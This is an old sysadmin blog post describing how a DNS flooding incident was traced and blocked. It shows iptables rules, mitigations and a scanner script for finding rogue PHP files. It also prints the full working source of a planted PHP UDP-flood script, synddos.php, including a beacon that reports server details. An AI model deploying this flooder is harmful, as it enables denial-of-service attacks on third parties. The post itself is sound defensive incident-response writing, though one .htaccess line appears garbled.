
resolved – port 53 dns flooding attack

April 13th, 2012


I found this port 53 DNS flooding attack when the server became very unstable: the NIC kept flapping and networking went down without the OS rebooting.

Using ntop as a detector, I found that DNS traffic was at a very high level (about 3Gb of traffic). So I decided to block DNS traffic and allow only the usual ports.

  • stop iptables and disable autoboot of iptables
/etc/init.d/iptables stop
mv /etc/rc3.d/S08iptables /etc/rc3.d/s08iptables
  • here’s the rules

[root@doxer ~]# cat iptables-stop-flood.sh

#!/bin/bash
iptables -F

#Note that DROP is different from REJECT. REJECT returns an error to the client (telnet shows "Connection refused"), but DROP just discards the packet (telnet hangs at "Trying..." and then returns "Connection timed out").
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP

#todo - allow no more than 5 new connections per second
#iptables -A INPUT -p tcp --syn -m limit --limit 5/s -i eth0 -j ACCEPT

# Allow traffic already established to continue
iptables -A INPUT -p all -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p all -m state --state INVALID -j DROP

#Allow ftp, http, mysql
#todo - without -m multiport, --dport or --sport takes a single port or a range (low:high)
#todo - multiport --ports matches if either the source or the destination port is in the list
iptables -A INPUT -p tcp -m multiport --dport 20,21,80,3306 -j ACCEPT
iptables -A OUTPUT -p tcp -m multiport --sport 20,21,80,3000,3306 -j ACCEPT

#Allow outgoing http, e.g. telnet doxer 80
iptables -A OUTPUT -p tcp --dport 80 -j ACCEPT

#Allow ntop
iptables -A INPUT -p udp -m multiport --dport 3000 -j ACCEPT
iptables -A INPUT -p tcp -m multiport --dport 3000 -j ACCEPT

#Allow sftp
iptables -A INPUT -p tcp --dport 115 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 115 -j ACCEPT

#Allow ssh, incoming and outgoing
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A INPUT -p tcp --sport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT

#allow rsync
iptables -A OUTPUT -p tcp --dport 873 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --sport 873 -j ACCEPT
iptables -A INPUT -p tcp --dport 873 -j ACCEPT

#allow ftp passive mode (configure the passive port range in vsftpd first)
iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp --dport 35000:37000 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 35000:37000 -j ACCEPT

#Allow ping. ICMP echo-request is type 8, echo-reply is type 0
#allow other hosts to ping this host (rate-limited to 1 request per second)
iptables -A INPUT -p icmp --icmp-type 8 -m limit --limit 1/s -j ACCEPT
#iptables -A INPUT -p icmp --icmp-type 8 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 0 -j ACCEPT
#allow this host to ping others
iptables -A INPUT -p icmp --icmp-type 0 -j ACCEPT
iptables -A OUTPUT -p icmp --icmp-type 8 -j ACCEPT

#allow dns query (left commented out so the DNS flood stays blocked)
#iptables -A OUTPUT -p udp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p udp --sport 53 -m state --state ESTABLISHED -j ACCEPT
#iptables -A OUTPUT -p tcp --dport 53 -m state --state NEW,ESTABLISHED -j ACCEPT
#iptables -A INPUT -p tcp --sport 53 -m state --state ESTABLISHED -j ACCEPT

# Allow local loopback services (both directions, since the OUTPUT policy is DROP too)
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

#save and restart iptables
/etc/init.d/iptables save
/etc/init.d/iptables restart

  • run the rules

chmod +x ./iptables-stop-flood.sh && ./iptables-stop-flood.sh

  • enable autoboot of iptables
If everything is ok, enable autoboot of iptables:
mv /etc/rc3.d/s08iptables /etc/rc3.d/S08iptables

After all these steps, DNS traffic dropped back to normal.

NB:

After several days of investigation, I finally found out that the attack originated from some worms (PHP worms?) embedded in dedecms's directory. Here's one file, called synddos.php:

<?php
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_REQUEST['time'];
$Sendlen = 65535;
$packets = 0;
ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){
if (StrLen($_GET['rat'])<>0){
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Warning to: opening";
exit;
}

for($i=0;$i<$Sendlen;$i++){
$out .= "A";
}

$max_time = time()+$exec_time;

while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}

echo "Send Host:$host:$port<br><br>";
echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";
echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";
?>

This is crazy! That explains why there was so much outgoing DNS traffic!

To fix this weakness:

1. Disable the fsockopen function in php.ini:

disable_functions = fsockopen

2. In the .htaccess file, stop PHP scripts from running out of the upload, data and template directories:

RewriteEngine on
RewriteCond % !^$
RewriteRule uploads/(.*)\.(php)$ - [F]
RewriteRule data/(.*)\.(php)$ - [F]
RewriteRule templets/(.*)\.(php)$ - [F]
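To find any other copies of this kind of script, here is an added check (not from the original post) that walks a web root and reports PHP files which open a UDP socket with fsockopen() and take the target host from request parameters, which is exactly the shape of synddos.php above; the sample web root it builds is constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original post. Flags PHP files that look like
# synddos.php: an fsockopen("udp://...") whose target comes from the request.

# Print every *.php under $1 that both opens a UDP socket with fsockopen()
# and reads $_GET / $_POST / $_REQUEST (attacker-chosen host and port).
scan_udp_flooders() {
    root="$1"
    find "$root" -name '*.php' -exec grep -lE \
        "fsockopen[[:space:]]*\([[:space:]]*[\"']udp://" {} + 2>/dev/null |
    while IFS= read -r f; do
        # Second filter: a fixed UDP target (e.g. a local syslog relay) is not a flooder.
        if grep -qE '\$_(GET|POST|REQUEST)\[' "$f"; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# Constructed sample web root: one flooder, one legitimate UDP client, one plain page.
make_sample_webroot() {
    dir=$(mktemp -d)
    mkdir -p "$dir/uploads" "$dir/include"
    # The pattern from synddos.php, dropped into an upload directory.
    cat > "$dir/uploads/synddos.php" <<'EOF'
<?php
$host = $_GET['host']; $port = $_GET['port'];
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
EOF
    # Legitimate: UDP to a fixed local address, no request-controlled target.
    cat > "$dir/include/syslog.php" <<'EOF'
<?php
$fp = fsockopen('udp://127.0.0.1', 514, $errno, $errstr, 2);
EOF
    # Legitimate: reads $_GET but never opens a socket.
    cat > "$dir/index.php" <<'EOF'
<?php echo htmlspecialchars($_GET['q']);
EOF
    printf '%s\n' "$dir"
}

root=$(make_sample_webroot)
echo "Suspicious PHP files under $root:"
scan_udp_flooders "$root"      # prints only .../uploads/synddos.php
rm -rf "$root"
```

Run it against the real document root (for example scan_udp_flooders /var/www) and review each hit by hand; the second filter keeps ordinary UDP clients with a fixed destination out of the list.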

